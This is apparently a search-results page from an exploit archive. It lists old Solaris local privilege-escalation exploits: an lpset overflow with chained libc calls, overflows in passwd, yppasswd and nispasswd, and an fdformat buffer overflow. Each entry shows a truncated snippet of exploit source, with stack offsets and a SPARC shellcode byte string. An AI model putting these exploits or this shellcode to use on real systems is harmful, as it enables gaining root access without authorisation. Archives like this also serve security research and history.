65 matches found
lpset.overflow
Here's an overflow exploit that works on a non-exec stack on x86 boxes. It demonstrates how it is possible to thread together several libc calls. I have not seen any other exploits for x86 that have done this.. for the lpset bug in sol7 x86. Tim N. #define BASE 0xdff40000 #define STACK 0x8047e30...
Solaris 2.4 passwd, yppasswd, and nispasswd Overflow Exploits
Exploit for Solaris platform in category local exploits. File newpass.c...
Solaris 2.4 passwd / yppasswd / nispasswd - Local Overflow
---------------------------- file newpass.c ------------------------------- include include define hiddenpasswd "/bin/hpasswd" /change here .../ define MAXLENGTH 32 void mainint argc, char argv int i; char args10; ifargc MAXLENGTH printf"You reached the maximum length in args\n"; exit0; else...
Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits
Exploit for Solaris platform in category local exploits. File lion24.c...
Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow
--------------------------- lion24.c --------------------------------- / Solaris 2.4 / include include include include define BUFLENGTH 264 define EXTRA 36 define STACKOFFSET -56 define SPARCNOP 0xa61cc013 uchar sparcshellcode = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"...